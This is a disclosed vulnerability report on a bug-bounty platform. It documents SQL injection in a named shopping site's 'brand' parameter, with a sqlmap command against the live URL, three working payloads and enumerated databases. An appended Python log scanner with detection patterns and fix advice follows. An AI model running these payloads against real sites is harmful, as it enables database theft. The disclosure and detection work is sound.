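2015-12-27: Details reported to the vendor; awaiting vendor handling
2015-12-28: Vendor confirmed; details disclosed to the vendor only
2016-01-07: Details disclosed to core white hats and experts in related fields
2016-01-17: Details disclosed to regular white hats
2016-01-27: Details disclosed to intern white hats
2016-02-09: Details disclosed to the public
I heard that Aili (爱丽网) is the vendor that gives out the most gifts on WooYun, so here I am.
The site seems to be down...... Injection point: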
http://www.wenji99.com/?m=product&s=list&brand=%E6%83%A0%E6%99%AEHP&brand_id=623
python sqlmap.py -u "http://www.wenji99.com/?m=product&s=list&brand=%E6%83%A0%E6%99%AEHP&brand_id=623" --dbs
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n]
[14:16:40] [INFO] GET parameter 'brand' seems to be 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause' injectable
[14:16:40] [INFO] GET parameter 'brand' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' injectable
[14:16:57] [INFO] GET parameter 'brand' seems to be 'MySQL >= 5.0.12 AND time-based blind (SELECT)' injectable
GET parameter 'brand' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 850 HTTP(s) requests:
---
Parameter: brand (GET)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: m=product&s=list&brand=%E6%83%A0%E6%99%AEHP' RLIKE (SELECT (CASE WHEN (1900=1900) THEN 0x2545362538332541302545362539392541454850 ELSE 0x28 END)) AND 'Ppcc'='Ppcc&brand_id=623

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: m=product&s=list&brand=%E6%83%A0%E6%99%AEHP' AND (SELECT 7915 FROM(SELECT COUNT(*),CONCAT(0x716b707a71,(SELECT (ELT(7915=7915,1))),0x716a767171,FLOOR(RAND(0)*2))x FROM INFORMATION_S

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: m=product&s=list&brand=%E6%83%A0%E6%99%AEHP' AND (SELECT * FROM (SELECT(SLEEP(5)))pTQH) AND 'opmk'='opmk&brand_id=623
---
[14:22:04] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.3.3, Nginx
back-end DBMS: MySQL 5.0
[14:22:04] [INFO] fetching database names
[14:22:12] [INFO] the SQL query used returns 3 entries
[14:22:14] [INFO] retrieved: information_schema
[14:22:17] [INFO] retrieved: mysql
[14:22:18] [INFO] retrieved: wenji
available databases [3]:
[*] information_schema
[*] mysql
[*] wenji
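The database, and the account is DBA
Main database: 599 tables
Password information
Please don't ignore this
Severity: High
Vulnerability Rank: 20
Confirmed at: 2015-12-28 14:08
This site has an unprecedented number of holes
None yet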
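
For defenders reviewing web server logs after a report like this one, the following added example (not part of the original report) flags requests whose query parameters carry the three technique markers sqlmap listed for `brand`. The function names, the nginx "combined" log format and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, quote, urlsplit

# One signature per technique sqlmap reported for `brand`. Signature matching
# only flags probing; it can be evaded and does not replace fixing the query.
SIGNATURES = {
    "boolean-based blind": re.compile(r"\bRLIKE\s*\(\s*SELECT\b", re.I),
    "error-based": re.compile(r"FLOOR\s*\(\s*RAND\s*\(\s*0\s*\)\s*\*\s*2\s*\)", re.I),
    "time-based blind": re.compile(r"\bSLEEP\s*\(\s*\d+\s*\)", re.I),
}
# Request line of an nginx "combined" access log entry.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def classify(url):
    """Map each query parameter to the injection techniques its value matches."""
    hits = {}
    for name, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        found = [tech for tech, rx in SIGNATURES.items() if rx.search(value)]
        if found:
            hits[name] = found
    return hits

def scan(lines):
    """Yield (line_number, hits) for every log line with a flagged parameter."""
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        hits = classify(match.group(1)) if match else {}
        if hits:
            yield number, hits

def _entry(brand):
    # Constructed log line; 203.0.113.7 is a documentation address.
    return ('203.0.113.7 - - [27/Dec/2015:14:16:40 +0800] "GET /?m=product&s=list'
            '&brand=%s&brand_id=623 HTTP/1.1" 200 512' % quote(brand))

# Constructed sample: one normal request, then values abbreviated from the
# three payload types in the sqlmap output above.
SAMPLE_LOG = [
    _entry("惠普HP"),
    _entry("惠普HP' RLIKE (SELECT (CASE WHEN (1900=1900) THEN 0x25 ELSE 0x28 END))"),
    _entry("惠普HP' AND (SELECT COUNT(*),FLOOR(RAND(0)*2))"),
    _entry("惠普HP' AND (SELECT * FROM (SELECT(SLEEP(5)))pTQH) AND 'opmk'='opmk"),
]

if __name__ == "__main__":
    for number, hits in scan(SAMPLE_LOG):
        print(number, hits)
```

The underlying fix is on the application side: bind `brand` as a parameter in a prepared statement instead of concatenating it into the SQL string, and run the application under a database account that is not DBA.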